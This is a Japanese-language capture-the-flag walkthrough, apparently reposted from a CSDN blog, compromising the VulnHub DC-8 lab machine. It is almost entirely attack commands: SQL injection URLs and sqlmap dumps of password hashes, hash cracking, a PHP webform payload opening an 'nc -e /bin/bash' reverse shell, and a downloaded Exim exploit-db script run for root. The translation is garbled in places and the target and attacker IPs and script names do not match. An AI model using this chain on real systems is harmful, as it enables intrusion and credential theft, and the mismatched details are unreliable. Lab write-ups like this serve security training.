vulnhub-DC8 ターゲットドローン実験

Vulnhub ターゲット ドローンのダウンロード:

ターゲットドローンのダウンロード

公式 Web サイトのアドレス: https://download.vulnhub.com/dc/DC-8.zip
ターゲット マシン ファイルをダウンロードした後、インポートして使用できます。ターゲット マシンには1 つのフラグ値しかありません。DC6
ターゲット マシンの IP アドレス: 192.168.18.128
kali 攻撃マシンの IP アドレス:192.168.18.102

① 信頼の収集

#扫描存活主机
arp-scan  -l
#nmap扫描开放端口信息
nmap -A -p- 192.168.18.102

ここに画像の説明を挿入しますポートを開き22Web サイトのログイン監視 URL80を実行します。
ここに画像の説明を挿入しますSQL注入

#查询到数据库名字: d7db 
http://192.168.18.102/?nid=-1 union select database() --+

#查询数据库版本:10.1.26-MariaDB-0+deb9u1
http://192.168.18.102/?nid=-1 union select version() --+

手動インジェクションのリファレンスリンクDC8 射撃場での SQL の手動インジェクション

ディレクトリスキャン

dirsearch  --url http://192.168.18.102

ここに画像の説明を挿入しますユーザーのログインアドレスhttp://192.168.18.102/user/login
データの爆発的増加

sqlmap -u http://192.168.18.102/?nid=1 --dbs 
sqlmap -u http://192.168.18.102/?nid=1 -D  d7db
sqlmap -u http://192.168.18.102/?nid=1 -D  d7db -T  users --columns
sqlmap -u http://192.168.18.102/?nid=1 -D  d7db -T  users -C name,pass --dump
cat pass 
admin:$S$D2tRcYRyqVFNSc0NvYUrYeQbLQg5koMKtihYTIDC9QQqJi3ICg5z
john:$S$DqupvJbxVmqjr6cYePnx2A891ln7lsuku/3if/oRVZJaz5mKC2vF

ここに画像の説明を挿入します

②パスワードブラスティング

john pass 

ここに画像の説明を挿入しますログインするためのユーザー名 johnとパスワードturtle
ここに画像の説明を挿入します

③リバウンドシェル

クリックContent- >クリック - edit>クリック - WEBFORMS>クリック - Form settings>ドロップダウン ボックスをクリックして選択しますPHP code
ここに画像の説明を挿入しますここに画像の説明を挿入します

ご連絡いただきありがとうございます。すぐにご連絡させていただきます。

<?php system("nc -e /bin/bash 192.168.18.128 1234"); ?>

ここに画像の説明を挿入します

kali攻击机进行监听1234端口  
nc -nlvp 1234
#浏览器中点击任意`Submit`按钮即可实现连接

ここに画像の説明を挿入します

④ユーザー権限昇格

#连接shell
python -c 'import pty;pty.spawn("/bin/bash")'
find  / -perm  -u=s  -type f 2>/dev/null

ここに画像の説明を挿入します関連する脆弱性を検索する searchsploit exim
ここに画像の説明を挿入します

cp /usr/share/exploitdb/exploits/linux/local/46996.sh 666.sh
cat 666.sh
cp 666.sh  /var/www/html
vi  666.sh
#在最后一行插入set  ff=unix,进行保存

伝染 ; 感染

#kali机上
service apache2 start
#连接的dc8
cd /tmp
wget  http://192.168.18.128/66.sh

ここに画像の説明を挿入します

chmod 777 666.sh  #给权限
ls -l
./666.sh  -m netcat

ここに画像の説明を挿入します

⑤フラグをゲット

cd /root
cat flag.txt

ここに画像の説明を挿入します

おすすめ

転載: blog.csdn.net/m0_64118193/article/details/128168121